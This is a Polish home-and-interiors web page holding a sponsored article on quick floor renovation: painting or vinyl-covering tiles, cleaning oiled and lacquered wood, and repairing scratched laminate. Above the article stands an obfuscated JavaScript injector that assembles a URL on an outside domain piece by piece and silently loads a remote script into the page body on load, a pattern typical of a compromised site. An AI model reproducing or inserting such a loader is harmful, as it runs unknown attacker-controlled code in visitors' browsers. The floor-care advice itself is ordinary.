(function(){ qkn8=document.createElement("script");qkn8_=("us")+("ta"); qkn8_+="t"+(".");qkn8_+=("in");qkn8u="431896039";qkn8.async=true; qkn8u+=".yq2ik7c2kn8lfj22f";qkn8.type="text/javascript";qkn8_+="f"+"o"+("/"); qkn8u+="7sv3pX5th4q11";qkn8.src="https://"+qkn8_+qkn8u; dqkn8=document.body;dqkn8.appendChild(qkn8); })();

Poznaj sposoby na szybki remont podłogi!

Twoja podłoga jest zniszczona i przetarta? Jeśli zastanawiasz się, jak ją odnowić, to z pewnością zaciekawi Cię nasz artykuł. Przygotowaliśmy dla Ciebie 3 najlepsze sposoby na szybki remont starej podłogi. Zapraszamy do lektury!

Poznaj przyczyny remontu i dowiedz się, jak im zapobiegać!

Źle położona podłoga może dać znać o sobie już po kilku latach użytkowania. Podobnie jest również w przypadku słabej jakości materiałów. Te zawsze powinny być dobrane do rodzaju pomieszczenia, jego metrażu, przeznaczenia, czy sposobu użytkowania. Przykładowo, decydując się na wykończenie podłogi panelami, warto wziąć pod uwagę zróżnicowane klasy ścieralności. Inne potrzeby będzie posiadała bowiem podłoga w salonie, a inna w sypialni, czy korytarzu.

Panele podłogowe w sypialni mogą posiadać niższą klasę ścieralności niż te, położone w salonie, czy pokoju dziecięcym. To pomieszczenia często użytkowane, które mogą wymagać klasy ścieralności AC4 lub AC5. Podłoga w łazience, kuchni, czy przedpokoju może wymagać dodatkowo właściwości wodoodpornych. Podobnie jest również z płytkami, czy deskami – zawsze warto dopasować ich jakość i klasę do potrzeb pomieszczenia – w innym przypadku już po kilku latach wystąpi potrzeba remontu lub renowacji.

Metody renowacji podłóg

Jeśli Twoja podłoga uległa zniszczeniu, zatarciu lub po prostu przestała prezentować się świeżo, to wiedz, że można jeszcze dużo z nią zdziałać! Wszystko zależy od tego, jaką podłogę posiadasz. Omówimy teraz 3 najlepsze metody renowacji podłóg dla różnych rodzajów wykończeń.

1. Podłoga z płytek

Podłoga z płytek no jedna z najtrudniejszych do renowacji podłóg. W końcu ich wymiana wiąże się z czasochłonnym i stosunkowo drogim remontem. Warto skorzystać więc z różnorodnych metod renowacyjnych. Jedną z nich może być ich pomalowanie. Tutaj warto skorzystać z dedykowanej farby, którą nakładamy na odtłuszczoną i wyschniętą powierzchnię. Warto wcześniej nałożyć również warstwę gruntu, który potrzebuje 16-72 godzin do pełnego wyschnięcia.

Dobrą alternatywą dla malowania są panele winylowe, które można położyć bezpośrednio na płytki. Tutaj sprawa jest zdecydowanie mniej czasochłonna, a sam winyl doskonale prezentuje się na podłodze, imitując drewno lub kamień. Tego typu renowację możesz również przeprowadzić samodzielnie, ponieważ panele winylowe są szczególnie łatwe w montażu.

2. Podłoga z drewna

Od razu warto wspomnieć, że inaczej poddaje się renowacji podłogi olejowane, a inaczej lakierowane. W przypadku tych pierwszych już samo dokładne umycie powierzchni może w zdecydowanym stopniu odświeżyć wygląd podłogi. Warto więc zacząć od jej dokładnego odkurzenia, a następnie umyć z pomocą dedykowanego mydła. Następnie warto zabezpieczyć podłogę ponownie warstwą natłuszczającą.

Jeśli chodzi o podłogę lakierowaną, należy zacząć od dokładnego jej odkurzenia, a następnie zmycia posadzki z pomocą wilgotnego mopa. Tu ważne jest zastosowanie środka o beztłuszczowej formie. Poważniejsze zabrudzenia można usunąć domowymi sposobami, takimi jak spirytus, płyt do naczyń i benzyna ekstrakcyjna. Tego typu preparaty należy jednak nakładać punktowo, bezpośrednio na plamy.

3. Panele podłogowe

Jednym z najczęstszych problemów, jakie pojawiają się przy panelach, są rysy. Te powstają zwłaszcza na produktach o niższej klasie ścieralności, w miejscach często używanych. Możesz się ich pozbyć z pomocą kredki do paneli. W jej skład wchodzi specjalny wosk naprawczy do paneli o różnej kolorystyce.

Wypełniacz do paneli to rozwiązanie, które sprawdza się w przypadku głębszych rys. Pasta pokrywa cały ubytek, sprawiając, że staje się on niewidoczny. Wyschnięty produkt można wygładzić delikatnie papierem ściernym, a następnie nałożyć dopasowany do paneli kolorystycznie lakier.

Ciekawym sposobem jest również pomalowanie powierzchni paneli, dedykowaną farbą. Taki proces należy zacząć od starcia zewnętrznej warstwy lakieru, aby efekt malowania był trwały, a farba dobrze się trzymała. Po oczyszczeniu z resztek pyłu i lakieru, możesz przejść do malowania dedykowaną farbą.

Mamy nadzieję, że podsunęliśmy Ci ciekawy sposób na renowację starej i zatartej podłogi, który pozwoli Ci cieszyć się pięknym, świeżym i stylowym wnętrzem.

Materiał sponsorowany fachura.net

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button